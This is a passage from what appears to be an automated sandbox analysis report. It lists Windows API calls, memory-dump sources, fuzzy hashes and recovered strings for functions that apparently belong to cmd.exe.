                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0120B980,000000A0,00000000,00000000,?,?,?,?,?), ref: 011DC67C
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?), ref: 011DC6DC
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC6E7
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                    • String ID:
                                    • API String ID: 2173784998-0
                                    • Opcode ID: dd9d13557a7a5507b2bc74b34ce1d2ae7cd76e4caefc74f12ed37c7b82769426
                                    • Instruction ID: 893abb90bef1201fcfc3a439baa35969891ca4895b4f03057563b492d7a5f580
                                    • Opcode Fuzzy Hash: dd9d13557a7a5507b2bc74b34ce1d2ae7cd76e4caefc74f12ed37c7b82769426
                                    • Instruction Fuzzy Hash: 16818271E00119AFDF28DFA8F89CABEBBB9EF54715F01442AE906D7244DB309941CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D5B31
                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D5B45
                                    • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D5B59
                                    • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D5B6D
                                    • realloc.MSVCRT ref: 011E9C24
                                      • Part of subcall function 011E41A4: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(011D5BA1,0000001F,?,00000080), ref: 011E41A4
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 011D5BA2
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 011D5C2A
                                    • memmove.MSVCRT ref: 011D5D23
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 011D5D4D
                                    • realloc.MSVCRT ref: 011D5D68
                                    • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 011D5D9C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                    • String ID: %02d%s%02d%s%02d$%s $%s %s
                                    • API String ID: 2927284792-4023967598
                                    • Opcode ID: 276b72f15e50af914f3d69413f6bb0c92b52d2679d448c1580c1df7a60febb3b
                                    • Instruction ID: 76cd7a06cad67bd7d68d8fe329aa2d965ab84651da7277fc0e31147f3469e279
                                    • Opcode Fuzzy Hash: 276b72f15e50af914f3d69413f6bb0c92b52d2679d448c1580c1df7a60febb3b
                                    • Instruction Fuzzy Hash: 14C1B471A006299BDF2CDB98DC4CAFE77F9EB99708F004169E90AD7244DB319E81CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011D862C
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000105), ref: 011D8691
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105), ref: 011D86A1
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,011D250C,?,?,?,-00000105), ref: 011D8715
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000105), ref: 011D8827
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 011D8842
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D885C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Find$File$CloseFirstmemset$Next
                                    • String ID: \\?\
                                    • API String ID: 3059144641-4282027825
                                    • Opcode ID: 83ca8c62d9b19c3c7d69e25fb9a1da284cf8f5e6a70b6f06c85468c62b2b9588
                                    • Instruction ID: 0e3f421af7f84e1e86e2c1c3aec1e6f4d4825a6dbf7035d2294294d4b06031d6
                                    • Opcode Fuzzy Hash: 83ca8c62d9b19c3c7d69e25fb9a1da284cf8f5e6a70b6f06c85468c62b2b9588
                                    • Instruction Fuzzy Hash: D4D1D571A0011A9BDF2DDB68EC99BBE7779EF18304F4404ADE609D3142EB709A85CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(8C8BFE4F,?,00000000), ref: 011F7062
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F7074
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • towupper.MSVCRT ref: 011F720E
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 011F7343
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,011D1EB4,011D3958), ref: 011F7467
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,8C8BFE4F,?,00000000), ref: 011F765F
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F7672
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                    • String ID: %s $%s>$PROMPT$Unknown
                                    • API String ID: 708651206-3050974680
                                    • Opcode ID: bc94f35bd33e998031323e592dc12f861d0d8361c922444bbe529f01e04f79dc
                                    • Instruction ID: 95f026a0171d62c6cfe02235972da7af9d2101779e45c98b7c33a3d9a86c882d
                                    • Opcode Fuzzy Hash: bc94f35bd33e998031323e592dc12f861d0d8361c922444bbe529f01e04f79dc
                                    • Instruction Fuzzy Hash: 3A02D479A011169BDF3CDF28D84D6BAB7B6FF54304F04829EE909E7294EB305A81CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011FB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 011FB533
                                      • Part of subcall function 011FB51A: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 011FB54F
                                      • Part of subcall function 011FB51A: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 011FB560
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 011FB635
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 011FB656
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 011FB679
                                    • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 011FB694
                                    • memset.MSVCRT ref: 011FB6D5
                                    • memcpy.MSVCRT ref: 011FB70A
                                    • memcpy.MSVCRT ref: 011FB756
                                    • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 011FB778
                                    • RtlNtStatusToDosError.NTDLL ref: 011FB783
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011FB78A
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011FB79C
                                    • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 011FB7B7
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011FB7C8
                                      • Part of subcall function 011FB9D3: memset.MSVCRT ref: 011FBA0F
                                      • Part of subcall function 011FB9D3: memset.MSVCRT ref: 011FBA37
                                      • Part of subcall function 011FB9D3: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 011FBAA8
                                      • Part of subcall function 011FB9D3: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 011FBAC7
                                      • Part of subcall function 011FB9D3: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 011FBB0B
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                    • String ID:
                                    • API String ID: 223857506-0
                                    • Opcode ID: 356ebb384ef5a8ee8bf92b891f47f40fe946e2059795193ffc29adf7e704e30d
                                    • Instruction ID: 3b7fc173a566e4ec8d63d451b9b672e8c641dadc770bbcaf787c64c05c6bfcb5
                                    • Opcode Fuzzy Hash: 356ebb384ef5a8ee8bf92b891f47f40fe946e2059795193ffc29adf7e704e30d
                                    • Instruction Fuzzy Hash: B951C270A00605AFDB19DFB8CC58ABFB7B8EF48204F08412DEA06E7250EB359941CB64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • wcschr.MSVCRT ref: 011DE0F3
                                    • wcschr.MSVCRT ref: 011DE10B
                                    • _wcsicmp.MSVCRT ref: 011DE179
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE1ED
                                    • iswspace.MSVCRT ref: 011DE28B
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00007FE7,?,?,00000000), ref: 011DE2ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memsetwcschr$AttributesFile_wcsicmpiswspace
                                    • String ID: :.\$=,;$=,;+/[] "
                                    • API String ID: 313872294-843887632
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FE7,00000000), ref: 011DB90E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D96CC
                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D96E0
                                    • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D96F4
                                    • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D9708
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 011F0B1B
                                    • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 011F0C43
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Time$File$System$FormatInfoLocalLocale
                                    • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                    • API String ID: 55602301-2516506544
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: ELSE$IF/?
                                    • API String ID: 2081463915-1134991328
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,011E6A00,011E6A00,?,011DAE4F,00000037,00000000,?), ref: 011E68E6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,011DAE4F,00000037,00000000,?,?), ref: 011E696A
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,011DAE4F,00000037,00000000,?,?), ref: 011E697B
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E6982
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E69B7
                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E69BE
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000037,?,011DAE4F,00000037,00000000,?,?), ref: 011E69DA
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(011DAE4F,?,011DAE4F,00000037,00000000,?,?), ref: 011E69ED
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$Find$AllocFileProcess$CloseErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 1047556133-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 011D841B
                                    • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 011D846D
                                    • RtlReleaseRelativeName.NTDLL(?), ref: 011D8479
                                    • RtlFreeUnicodeString.NTDLL(?), ref: 011D8483
                                      • Part of subcall function 011D84BE: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 011D84EA
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 011D84A7
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000001), ref: 011F036E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,011D8393), ref: 011F037C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                    • String ID: @
                                    • API String ID: 2968197161-2766056989
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F6DB3
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F6DC5
                                    • fprintf.MSVCRT ref: 011F6DEB
                                    • fflush.MSVCRT ref: 011F6DF9
                                    • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F6E12
                                    • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 011F6E28
                                    • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F6E2F
                                    • _get_osfhandle.MSVCRT ref: 011F6E4C
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 011F6E54
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                    • String ID:
                                    • API String ID: 3139166086-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 011E3320: _wcsnicmp.MSVCRT ref: 011E33A4
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                      • Part of subcall function 011E62FA: _wcsnicmp.MSVCRT ref: 011E6367
                                      • Part of subcall function 011E62FA: _wcsnicmp.MSVCRT ref: 011EF6F6
                                    • memset.MSVCRT ref: 011E60C8
                                    • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00007EE3,00000001), ref: 011E620F
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011E6247
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011E6252
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E6271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
                                    • String ID: COPYCMD
                                    • API String ID: 1068965577-3727491224
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcsnicmpswscanf
                                    • String ID: :EOF
                                    • API String ID: 1534968528-551370653
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _setjmp3.MSVCRT ref: 011D58E1
                                      • Part of subcall function 011E36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,011D590A,00000000), ref: 011E36F0
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • NtQueryInformationProcess.NTDLL(000000FF,00000027,?,00000004,00000000), ref: 011D5991
                                    • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 011D59AF
                                    • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 011D5A17
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000), ref: 011E981B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                    • String ID: %9d
                                    • API String ID: 4212706909-2241623522
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011D528C
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,00000000,?), ref: 011D5394
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D53D5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$FullNamePath
                                    • String ID:
                                    • API String ID: 3158150540-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 011E24EC
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011E2505
                                    • memcpy.MSVCRT ref: 011E2566
                                    • _wcsnicmp.MSVCRT ref: 011E25BC
                                    • _wcsicmp.MSVCRT ref: 011ED61E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                    • String ID:
                                    • API String ID: 242869866-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 011E7540
                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E754F
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E7558
                                    • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 011E7561
                                    • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 011E7576
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                    • String ID:
                                    • API String ID: 1445889803-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • memset.MSVCRT ref: 011FA118
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 011FA1B5
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FA225
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: memset$DiskFreeSpace
                                    • String ID: %5lu
                                    • API String ID: 2448137811-2100233843
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    • Kernel-MUI-Language-Allowed, xrefs: 03A73DC0
                                    • Kernel-MUI-Language-SKU, xrefs: 03A73F70
                                    • WindowsExcludedProcs, xrefs: 03A73D6F
                                    • Kernel-MUI-Number-Allowed, xrefs: 03A73D8C
                                    • Kernel-MUI-Language-Disallowed, xrefs: 03A73E97
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                    • API String ID: 0-258546922
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,011F1735), ref: 011F1932
                                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 011F1939
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,011F1735), ref: 011F1957
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F195E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E7119,011D1000), ref: 011E6FEA
                                    • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(011E7119,?,011E7119,011D1000), ref: 011E6FF3
                                    • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,011E7119,011D1000), ref: 011E6FFE
                                    • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,011E7119,011D1000), ref: 011E7005
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp
